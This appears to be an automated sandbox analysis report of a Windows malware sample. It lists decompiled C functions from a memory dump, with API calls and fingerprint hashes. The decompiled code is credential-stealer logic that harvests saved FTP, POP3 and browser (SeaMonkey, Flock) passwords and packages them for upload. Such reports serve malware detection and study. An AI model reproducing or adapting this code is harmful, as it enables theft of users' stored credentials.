Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: GHA$GHA
API String ID: 2414487701-4188437078
Opcode ID: 56d358738f80bf6013dc8a74ae1ef7410d9387e93fbffc052ee4252ad9a379b4
Instruction ID: d9246f528be96856b322303a71286aa71aff6bea291017c40e37798af4e07103
Opcode Fuzzy Hash: 56d358738f80bf6013dc8a74ae1ef7410d9387e93fbffc052ee4252ad9a379b4
Instruction Fuzzy Hash: DAF03A75500208BEDF013F62CC85ADD3A9AEB50358F00C53BB8192A262D7BD8AD48B88

Uniqueness

Uniqueness Score: -1.00%

Function 00401DF8, Relevance: 9.0, APIs: 4, Strings: 2, Instructions: 29
stringCOMMON

Download Yara Rule

C-Code - Quality: 58%

			E00401DF8(void* __eax, char _a4, char _a8) {
				void* _t9;
				void* _t15;

				_t9 = __eax;
				if(_a4 == 0) {
					_a4 = 0x414847;
				}
				if(_a8 == 0) {
					_a8 = 0x414847;
				}
				_push(_a4);
				L0041066A();
				_t6 =  &_a8; // 0x414847
				_push( *_t6);
				L0041066A();
				_t15 = E004018CF(_t9 + _t9 + 1);
				_push(_a4);
				_push(_t15);
				L0041068E();
				_push(_a8);
				_push(_t15);
				L00410694();
				return _t15;
			}

0x00401df8
0x00401e00
0x00401e02
0x00401e02
0x00401e0d
0x00401e0f
0x00401e0f
0x00401e16
0x00401e19
0x00401e20
0x00401e20
0x00401e23
0x00401e31
0x00401e33
0x00401e36
0x00401e37
0x00401e3c
0x00401e3f
0x00401e40
0x00401e49

APIs

lstrlen.KERNEL32(?), ref: 00401E19
lstrlen.KERNEL32(00000000,?), ref: 00401E23
lstrcpy.KERNEL32(00000000,?), ref: 00401E37
lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

Strings

GHA, xrefs: 00401E02
GHA, xrefs: 00401E20

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: GHA$GHA
API String ID: 2414487701-4188437078
Opcode ID: 7614a2bc6214df05ae198ec1c5b43927a74fa08bf7555bedef183211b52c18f4
Instruction ID: 85b7a3d42229304cf13bff08406ee8d7f14fa5e6f164b37a1fc03a90bdb793dc
Opcode Fuzzy Hash: 7614a2bc6214df05ae198ec1c5b43927a74fa08bf7555bedef183211b52c18f4
Instruction Fuzzy Hash: 38F01C75100208BFDF017F62CC81A9D3B9AAB5035CF00D52AB91519152E7BD89E48B58

Uniqueness

Uniqueness Score: -1.00%

Function 00401A27, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 60
stringCOMMON

Download Yara Rule

C-Code - Quality: 79%

			E00401A27(void* __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				char _v278;
				void** _t26;
				intOrPtr _t29;
				int _t32;
				void* _t36;
				signed int _t38;
				signed int _t40;
				void* _t42;
				signed int _t46;

				_t42 = __ecx;
				_t40 = 0;
				_t26 =  &_v8;
				_push(_t26);
				_push(_a4);
				L00410790();
				_t44 = _t26;
				if(_t26 >= 0) {
					_t29 = E00401082(_t26, __edi, _t44, _a4);
					_v16 = _t29;
					GlobalFix(_v8);
					_t26 = _t29;
					_t45 = _t26;
					if(_t26 != 0) {
						_v20 = _t26;
						_v12 = E004018CF(_v16);
						E00401906(_v20, _v12, _v16);
						_t32 = GlobalUnWire(_v8);
						_push(_a8);
						L0041066A();
						E0040193F(_t42, _t45,  &_v278, _a8, _t32);
						_t36 = E004019AA( &_v278, _v12, _v16);
						_push(_a4);
						E0040131F(_t36, _t45);
						_t38 = E0040157E(_a4, "CRYPTED0YUI1.0", 8);
						_t40 = _t38 & E0040157E(_a4, _v12, _v16);
						_t46 = _t40;
						_t26 = E004018B8(_v12);
					}
				}
				_push(_a4);
				E0040129A(_t26, _t46);
				return _t40;
			}

0x00401a27
0x00401a31
0x00401a33
0x00401a36
0x00401a37
0x00401a3a
0x00401a3f
0x00401a41
0x00401a4a
0x00401a4f
0x00401a55
0x00401a5a
0x00401a5a
0x00401a5c
0x00401a5e
0x00401a69
0x00401a75
0x00401a7d
0x00401a82
0x00401a85
0x00401a95
0x00401aa7
0x00401aac
0x00401aaf
0x00401abe
0x00401ad3
0x00401ad3
0x00401ad8
0x00401ad8
0x00401a5c
0x00401add
0x00401ae0
0x00401ae9

APIs

73D83240.OLE32(?,?), ref: 00401A3A
GlobalFix.KERNEL32 ref: 00401A55

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

GlobalUnWire.KERNEL32 ref: 00401A7D
lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00401A85

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

CRYPTED0YUI1.0, xrefs: 00401AB6

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: GlobalLocal$AllocD83240FreeWirelstrlen
String ID: CRYPTED0YUI1.0
API String ID: 1413089268-1217275205
Opcode ID: 002f661a3d9b7e27aecb29e7a6e0ea1f0ccfb03bdd524ef02d32e77f62a9d182
Instruction ID: 291b1819b17b0b52e8b302f92d65d305c822eefb8dbf6a76828d30f87d665d9c
Opcode Fuzzy Hash: 002f661a3d9b7e27aecb29e7a6e0ea1f0ccfb03bdd524ef02d32e77f62a9d182
Instruction Fuzzy Hash: A1118671D00108BADF026FA1CC429DD7F7AEF44348F008076B915B51B1D77A8AA5AB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040FB14, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 56
COMMON

Download Yara Rule

C-Code - Quality: 77%

			E0040FB14(intOrPtr* __eax, void* __ecx, void* __edi, void* __eflags) {
				intOrPtr _v16;
				void* _v23;
				void* _v28;
				intOrPtr _v32;
				char* _v36;
				char* _t18;
				int _t23;
				void* _t26;
				void* _t30;

				_push(0x40fb29);
				asm("clc");
				if(__eflags < 0) {
					_t30 = __edi + 1;
					asm("hlt");
					 *__eax =  *__eax + __eax;
					 *__eax =  *__eax + __eax;
					_t26 = 0;
					_t15 =  &_v28;
					_push(_t15);
					_push(_v16);
					L00410790();
					__eflags = _t15;
					if(__eflags >= 0) {
						_v32 = E00401082(_t15, _t30, __eflags, _v16);
						_t23 = E004018CF(_t21 + 1);
						_v36 = _t23;
						GlobalFix(_v28);
						_t15 = _t23;
						__eflags = _t23;
						if(__eflags != 0) {
							E00401906(_t15, _v36, _v32);
							_t15 = GlobalUnWire(_v28);
						}
					}
					_push(_v16);
					E0040129A(_t15, __eflags);
					__eflags = _v36;
					if(_v36 != 0) {
						_t18 = StrStrIA(_v36, "STATUS-IMPORT-OK");
						__eflags = _t18;
						if(_t18 != 0) {
							_t26 = 1;
						}
						E004018B8(_v36);
					}
					return _t26;
				} else {
					return __eax;
				}
			}

0x0040fb1f
0x0040fb24
0x0040fb25
0x0040fb28
0x0040fb2b
0x0040fb2c
0x0040fb2e
0x0040fb30
0x0040fb32
0x0040fb35
0x0040fb36
0x0040fb39
0x0040fb3e
0x0040fb40
0x0040fb4a
0x0040fb4f
0x0040fb54
0x0040fb5a
0x0040fb5f
0x0040fb5f
0x0040fb61
0x0040fb6a
0x0040fb72
0x0040fb72
0x0040fb61
0x0040fb77
0x0040fb7a
0x0040fb7f
0x0040fb83
0x0040fb8d
0x0040fb92
0x0040fb94
0x0040fb96
0x0040fb96
0x0040fb9e
0x0040fb9e
0x0040fba7
0x0040fb27
0x0040fb27
0x0040fb27

APIs

73D83240.OLE32(?,?,0040FB29), ref: 0040FB39
GlobalFix.KERNEL32 ref: 0040FB5A
GlobalUnWire.KERNEL32 ref: 0040FB72
StrStrIA.SHLWAPI(00000000,STATUS-IMPORT-OK,?,?,?,0040FB29), ref: 0040FB8D

Strings

STATUS-IMPORT-OK, xrefs: 0040FB85

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: Global$D83240Wire
String ID: STATUS-IMPORT-OK
API String ID: 2699310191-1591331578
Opcode ID: d3c5594aa1a41db7cbbc94235fa4080673aeda6f723b2b3d8c29b7df58f914fc
Instruction ID: 90cea658c6c8212aa9fef009ba96f0a063fbcad0abcecaf4235fdd33f3ce5274
Opcode Fuzzy Hash: d3c5594aa1a41db7cbbc94235fa4080673aeda6f723b2b3d8c29b7df58f914fc
Instruction Fuzzy Hash: B0012135D04208BADF127BB2CC429AD7B79EB01348F504177B550B11A2DBBA9E949B58

Uniqueness

Uniqueness Score: -1.00%

Function 0040242B, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 45
stringCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040242B(void* __eflags, intOrPtr _a4) {
				void* _t5;
				int _t6;
				char* _t8;
				char* _t10;
				char* _t15;

				_t6 = E00401DF8(_t5, _a4, 0);
				_t15 = _t6;
				_push(_a4);
				L0041066A();
				if(_t6 > 1) {
					_push(_t15);
					if( *_t15 == 0x22) {
						asm("cld");
						_t3 =  &(_t15[1]); // 0x1
						memcpy(_t15, _t3, _t6);
					}
					_pop(_t15);
				}
				_t8 = StrStrIA(_t15, ".exe");
				if(_t8 != 0) {
					 *((char*)(_t8 + 4)) = 0;
				}
				_t10 = StrRChrIA(_t15, 0, 0x5c);
				if(_t10 == 0) {
					 *_t15 = 0;
				} else {
					 *_t10 = 0;
				}
				_push(_t15);
				L0041066A();
				if(_t10 <= 3) {
					 *_t15 = 0;
				}
				return _t15;
			}

0x00402435
0x0040243a
0x0040243c
0x0040243f
0x00402447
0x00402449
0x0040244d
0x0040244f
0x00402450
0x00402455
0x00402455
0x00402457
0x00402457
0x00402463
0x00402465
0x00402467
0x00402467
0x00402475
0x00402477
0x0040247e
0x00402479
0x00402479
0x00402479
0x00402481
0x00402482
0x0040248a
0x0040248c
0x0040248c
0x00402494

APIs

Part of subcall function 00401DF8: lstrlen.KERNEL32(?), ref: 00401E19
Part of subcall function 00401DF8: lstrlen.KERNEL32(00000000,?), ref: 00401E23
Part of subcall function 00401DF8: lstrcpy.KERNEL32(00000000,?), ref: 00401E37
Part of subcall function 00401DF8: lstrcat.KERNEL32(00000000,00000000), ref: 00401E40

lstrlen.KERNEL32(?), ref: 0040243F
StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Strings

.exe, xrefs: 00402458

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: lstrlen$lstrcatlstrcpy
String ID: .exe
API String ID: 2414487701-4119554291
Opcode ID: 5ad3214b74b9cb1d56dc2c5004a94a66f38f83406c7cfc38b38d6468029d243e
Instruction ID: f255478a9709c47b6028815859772bdce8d28858f668d5172353d83d27d3e8c2
Opcode Fuzzy Hash: 5ad3214b74b9cb1d56dc2c5004a94a66f38f83406c7cfc38b38d6468029d243e
Instruction Fuzzy Hash: F4F0C83120429269DB2132268C09F6F6F859B92744F14003BF640B72D3D7FC989297BE

Uniqueness

Uniqueness Score: -1.00%

Function 00409E81, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409E81(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t20;

				_t20 = __eflags;
				_t18 = __ecx;
				_v8 = E004015F0(_a4, 0x26, 0);
				 *0x416030 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "SeaMonkey", "\\Mozilla\\SeaMonkey\\");
				SetCurrentDirectoryA( &_v269);
				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

0x00409e81
0x00409e81
0x00409e96
0x00409e99
0x00409eaf
0x00409ecc
0x00409ee8
0x00409ef4
0x00409f05

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409EAF

Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409EF4

Strings

Software\Mozilla, xrefs: 00409EBE, 00409EDB
SeaMonkey, xrefs: 00409EB9, 00409ED6
\Mozilla\SeaMonkey\, xrefs: 00409EB4, 00409ED1

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: SeaMonkey$Software\Mozilla$\Mozilla\SeaMonkey\
API String ID: 3062143572-164276155
Opcode ID: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
Instruction ID: 6c0ca7a26b87c7c70e6a01aab92075298d7fe0072118fde892d006f484df090e
Opcode Fuzzy Hash: d71b08397f7855241f59228b2f7812fc7d16d5cd59468c82a62517f7b4ab111c
Instruction Fuzzy Hash: CBF01270680208BADF10AB51CD43FCD7B669B14748F1180667704751E3D7B9DAD19A48

Uniqueness

Uniqueness Score: -1.00%

Function 00409F08, Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 33
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00409F08(void* __ebx, void* __ecx, void* __edi, void* __eflags, intOrPtr _a4) {
				intOrPtr _v8;
				char _v269;
				void* _t18;
				void* _t20;

				_t20 = __eflags;
				_t18 = __ecx;
				_v8 = E004015F0(_a4, 0x27, 0);
				 *0x416030 = 0;
				GetCurrentDirectoryA(0x104,  &_v269);
				E00409C3C(_t18, _a4,  *0x414869, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				E00409C3C(_t18, _a4, 0x80000002, "Software\\Mozilla", "Flock", "\\Flock\\Browser\\");
				SetCurrentDirectoryA( &_v269);
				return E00401636(__ebx, _t18, __edi, _t20, _a4, _v8);
			}

0x00409f08
0x00409f08
0x00409f1d
0x00409f20
0x00409f36
0x00409f53
0x00409f6f
0x00409f7b
0x00409f8c

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?), ref: 00409F36

Part of subcall function 00409C3C: StrStrIA.SHLWAPI(?,?), ref: 00409C48
Part of subcall function 00409C3C: RegOpenKeyA.ADVAPI32(?,?,?), ref: 00409CBF
Part of subcall function 00409C3C: RegEnumKeyExA.ADVAPI32 ref: 00409CEB
Part of subcall function 00409C3C: RegCloseKey.ADVAPI32(?,?,00000000,?,000007FF,00000000,00000000,00000000,00000000,?,?,?,00000800,?,?), ref: 00409D33

SetCurrentDirectoryA.KERNEL32(?,?), ref: 00409F7B

Strings

\Flock\Browser\, xrefs: 00409F3B, 00409F58
Software\Mozilla, xrefs: 00409F45, 00409F62
Flock, xrefs: 00409F40, 00409F5D

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: CurrentDirectory$CloseEnumOpen
String ID: Flock$Software\Mozilla$\Flock\Browser\
API String ID: 3062143572-1276807325
Opcode ID: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
Instruction ID: f5280ec9e0107380a21299960ef084744ae8c2892abc79ad58e4b51ce706d511
Opcode Fuzzy Hash: 29296d0082a50089953f11c1f94118b563e7408bb88a0e5e02b1c8d3287188a8
Instruction Fuzzy Hash: FCF01730680208BADF51AB61CC43FCD7AB5AB14749F218076BA48751E3DBB9DAD19A48

Uniqueness

Uniqueness Score: -1.00%

Function 0040E63A, Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 135
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040E63A(void* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _v8;
				intOrPtr _v12;
				char _v20;
				char* _v24;
				char* _v28;
				unsigned int _v32;
				intOrPtr _v36;
				unsigned int _v40;
				void* _v44;
				char _v48;
				void* _t45;
				char _t48;
				char* _t50;
				char* _t59;
				char _t62;
				char _t65;
				char _t66;
				char* _t67;
				char _t69;
				char _t74;
				char _t82;
				char* _t83;
				char* _t84;
				char* _t85;

				_t45 = E00401F36(_a8);
				if(_t45 != 0) {
					_t48 = E00401FFD(__eflags, _a8,  &_v20);
					__eflags = _t48;
					if(_t48 != 0) {
						_push(_v8);
						_pop( *_t5);
						_v40 = _v40 >> 1;
						_t50 = E00402A3E(_v12, _v40);
						__eflags = _t50;
						if(_t50 == 0) {
							_v24 = E004018CF(_v8);
							E00401906(_v12, _v24, _v8);
							_t84 = _v24;
						} else {
							_v24 = _t50;
							_t84 = _t50;
						}
						while(1) {
							_t85 = _t84;
							__eflags = _t85;
							if(_t85 == 0) {
								break;
							}
							__eflags =  *_t85;
							if( *_t85 != 0) {
								_t83 = "<POP3_Password2";
								while(1) {
									_t59 = StrStrA(_t85, _t83);
									__eflags = _t59;
									if(_t59 != 0) {
										break;
									}
									L10:
									asm("cld");
									asm("repne scasb");
									__eflags =  *_t83;
									if( *_t83 != 0) {
										continue;
									}
									goto L24;
								}
								_t62 = StrStrIA(_t59, 0x416baa);
								__eflags = _t62;
								if(_t62 != 0) {
									_t84 = _t62 + 1;
									_v28 = _t84;
									_t65 = StrStrA(_t84, 0x416bac);
									__eflags = _t65;
									if(_t65 != 0) {
										 *_t65 = 0;
										_push(_t65);
										_push( *_t65);
										_push(_v28);
										L0041066A();
										_t66 = _t65;
										__eflags = _t66;
										if(_t66 != 0) {
											_v32 = _t66;
											_v36 = E00402A1D(_t66, _v28);
											_t69 = E00402B0D(_v36, _v32);
											__eflags = _t69;
											if(_t69 != 0) {
												_v32 = _v32 >> 1;
												 *_t26 =  *0x416ba2;
												 *_t27 =  *0x416ba6;
												_t74 = E004043DC(_v36,  &_v32,  &_v48);
												__eflags = _t74;
												if(_t74 != 0) {
													E004015CB(E00401569(_a4, 0xbeef0001), _a4, _v28);
													E0040159F(_a4, _v36, _v32);
												}
											}
											E004018B8(_v36);
										}
										_pop(_t82);
										_pop(_t67);
										 *_t67 = _t82;
										continue;
									}
								} else {
								}
							}
							break;
						}
						L24:
						E00401569(_a4, 0xbeef0002);
						E0040159F(_a4, _v12, _v8);
						E004018B8(_v24);
						return E00402091( &_v20);
					}
					return _t48;
				} else {
					return _t45;
				}
			}

0x0040e64a
0x0040e64c
0x0040e660
0x0040e660
0x0040e662
0x0040e668
0x0040e66b
0x0040e66e
0x0040e67c
0x0040e67c
0x0040e67e
0x0040e68f
0x0040e69b
0x0040e6a0
0x0040e680
0x0040e680
0x0040e683
0x0040e683
0x0040e788
0x0040e788
0x0040e788
0x0040e78a
0x00000000
0x00000000
0x0040e78c
0x0040e78f
0x0040e6a8
0x0040e6ad
0x0040e6b4
0x0040e6b4
0x0040e6b6
0x00000000
0x00000000
0x0040e6ba
0x0040e6ba
0x0040e6c2
0x0040e6c4
0x0040e6c6
0x00000000
0x00000000
0x00000000
0x0040e6c8
0x0040e6da
0x0040e6da
0x0040e6dc
0x0040e6e4
0x0040e6e6
0x0040e6f4
0x0040e6f4
0x0040e6f6
0x0040e6ff
0x0040e702
0x0040e703
0x0040e704
0x0040e707
0x0040e70c
0x0040e70c
0x0040e70e
0x0040e710
0x0040e71b
0x0040e724
0x0040e729
0x0040e72b
0x0040e72d
0x0040e736
0x0040e73f
0x0040e74d
0x0040e752
0x0040e754
0x0040e769
0x0040e777
0x0040e777
0x0040e754
0x0040e77f
0x0040e77f
0x0040e784
0x0040e785
0x0040e786
0x00000000
0x0040e786
0x00000000
0x0040e6de
0x0040e6dc
0x00000000
0x0040e78f
0x0040e795
0x0040e79d
0x0040e7ab
0x0040e7b3
0x00000000
0x0040e7bc
0x0040e7c6
0x0040e651
0x0040e651
0x0040e651

Strings

<POP3_Password2, xrefs: 0040E6A8

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: <POP3_Password2
API String ID: 0-2923094552
Opcode ID: f4dd957d2602c25f07d23ec95ea5155f997cdfa01a96e34ce4226c6535aa6aad
Instruction ID: 81c7923d4842b803ad45ce7413c013c6613b7a06965b9ff00af2c8356a2977a1
Opcode Fuzzy Hash: f4dd957d2602c25f07d23ec95ea5155f997cdfa01a96e34ce4226c6535aa6aad
Instruction Fuzzy Hash: 7C416031900019BEDF12ABA2DC01CEEBE76EF58354B144837F501B61A1D77A4E61EBA9

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD6B, Relevance: 7.6, APIs: 5, Instructions: 79
stringCOMMON

Download Yara Rule

C-Code - Quality: 80%

			E0040CD6B(char* _a4, short* _a8, intOrPtr _a12) {
				unsigned int _v8;
				char* _v12;
				int _v16;
				int _t24;
				char* _t28;
				char* _t29;
				char* _t30;
				char* _t37;
				void* _t38;
				void* _t39;
				int _t40;

				_v12 = 0;
				_v16 = 0;
				_push(_a12);
				_pop( *_t4);
				_v8 = _v8 >> 1;
				_t24 = WideCharToMultiByte(0, 0, _a8, _v8, 0, 0, 0, 0);
				if(_t24 != 0) {
					_v12 = E004018CF(_t24);
					_t40 = _t24;
					if(WideCharToMultiByte(0, 0, _a8, _v8, _v12, _t40, 0, 0) == 0) {
						E004018B8(_v12);
						_v12 = 0;
					}
				}
				if(_v12 == 0) {
					L12:
					E004018B8(_v12);
					return _v16;
				} else {
					_t28 = StrStrIA(_v12, _a4);
					if(_t28 == 0) {
						goto L12;
					}
					_push(_t28);
					_push(_a4);
					L0041066A();
					_pop(_t38);
					_t29 = _t28 + _t38;
					_t37 = _t29;
					while( *_t29 != 0) {
						if( *_t29 != 0xd) {
							_t29 = _t29 + 1;
							continue;
						}
						 *_t29 = 0;
						_push(_t37);
						L0041066A();
						_t30 = _t29;
						if(_t30 != 0) {
							_v16 = E004018CF(_t30);
							_t39 = _t30;
							E00401906(_t37, _v16, _t39);
						}
						goto L12;
					}
					goto L12;
				}
			}

0x0040cd72
0x0040cd79
0x0040cd80
0x0040cd83
0x0040cd86
0x0040cda0
0x0040cda2
0x0040cdab
0x0040cdae
0x0040cdc8
0x0040cdcd
0x0040cdd2
0x0040cdd2
0x0040cdc8
0x0040cddd
0x0040ce2d
0x0040ce30
0x0040ce3a
0x0040cddf
0x0040cdea
0x0040cdec
0x00000000
0x00000000
0x0040cdee
0x0040cdef
0x0040cdf2
0x0040cdf7
0x0040cdf8
0x0040cdfa
0x0040ce28
0x0040ce01
0x0040ce27
0x00000000
0x0040ce27
0x0040ce03
0x0040ce06
0x0040ce07
0x0040ce0c
0x0040ce0e
0x0040ce17
0x0040ce1a
0x0040ce20
0x0040ce20
0x00000000
0x0040ce25
0x00000000
0x0040ce28

APIs

WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CD9B
WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000), ref: 0040CDC1
StrStrIA.SHLWAPI(00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDE5
lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CE07

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

lstrlen.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?), ref: 0040CDF2

Part of subcall function 004018CF: LocalAlloc.KERNEL32(00000040,0040242B,?,004024AB,?), ref: 004018DD

Memory Dump Source

Source File: 00000000.00000002.657769246.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.657765158.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657784188.0000000000413000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.657791488.0000000000414000.00000004.00020000.sdmp Download File

Yara matches

Similarity

API ID: ByteCharLocalMultiWidelstrlen$AllocFree
String ID:
API String ID: 1890766102-0
Opcode ID: 4f3b149ad33d62d62555ab3cbe58e7cbe2c327d390151b697859a92122870a5f
Instruction ID: 41b9c1d827694c45b055be9885e390ab78c4181ca929fd9b4fad9bc2efccc836
Opcode Fuzzy Hash: 4f3b149ad33d62d62555ab3cbe58e7cbe2c327d390151b697859a92122870a5f
Instruction Fuzzy Hash: 2E214271D44208FEEF116BA1CC46F9E7F76EF04314F20456AB110B91E1D7B95A90DB68

Uniqueness

Uniqueness Score: -1.00%

Function 00405BC0, Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 60
COMMON

Download Yara Rule

C-Code - Quality: 90%

			E00405BC0(void* __ebx, void* __ecx, intOrPtr _a4) {
				intOrPtr _v8;
				void* __edi;
				char* _t9;
				char* _t11;
				void* _t20;
				void* _t21;
				char* _t22;
				char* _t23;

				_t21 = __ecx;
				_t20 = __ebx;
				_v8 = E004015F0(_a4, 7, 0);
				_t23 =  *0x4147ed; // 0x640b38
				_t22 =  *0x4147f1; // 0x645e80
				if( *_t22 != 0) {
					do {
						_t9 = StrStrIA(_t22, "FTP Navigator");
						_t25 = _t9;
						if(_t9 != 0) {
							E00404351(_a4, E0040242B(_t25, _t23), "ftplist.txt", 0xbeef0000);
							E004018B8(_t17);
						}
						_t11 = StrStrIA(_t22, "FTP Commander");
						_t26 = _t11;
						if(_t11 != 0) {
							E00404351(_a4, E0040242B(_t26, _t23), "ftplist.txt", 0xbeef0000);
							E004018B8(_t14);
						}
						while( *_t23 != 0) {
							_t23 = _t23 + 1;
							__eflags = _t23;
						}
						_t23 = _t23 + 1;
						asm("cld");
						_t21 = 0xffffffff;
						asm("repne scasb");
						_t28 =  *_t22;
					} while ( *_t22 != 0);
				}
				return E00401636(_t20, _t21, _t22, _t28, _a4, _v8);
			}

0x00405bc0
0x00405bc0
0x00405bd4
0x00405bd7
0x00405bdd
0x00405be6
0x00405be8
0x00405bee
0x00405bf3
0x00405bf5
0x00405c0c
0x00405c11
0x00405c11
0x00405c1c
0x00405c21
0x00405c23
0x00405c3a
0x00405c3f
0x00405c3f
0x00405c47
0x00405c46
0x00405c46
0x00405c46
0x00405c4c
0x00405c4d
0x00405c50
0x00405c55
0x00405c57
0x00405c57
0x00405be8
0x00405c69

APIs

StrStrIA.SHLWAPI(00645E80,FTP Navigator), ref: 00405BEE
StrStrIA.SHLWAPI(00645E80,FTP Commander,00645E80,FTP Navigator), ref: 00405C1C

Part of subcall function 0040242B: lstrlen.KERNEL32(?), ref: 0040243F
Part of subcall function 0040242B: StrStrIA.SHLWAPI(00000000,.exe,?), ref: 0040245E
Part of subcall function 0040242B: StrRChrIA.SHLWAPI(00000000,00000000,0000005C,00000000,.exe,?), ref: 00402470
Part of subcall function 0040242B: lstrlen.KERNEL32(00000000,00000000,00000000,0000005C,00000000,.exe,?), ref: 00402482

Part of subcall function 004018B8: LocalFree.KERNEL32(00000000,?,004024D2,?,?,?,?,?,?), ref: 004018C4

Strings

FTP Commander, xrefs: 00405C16
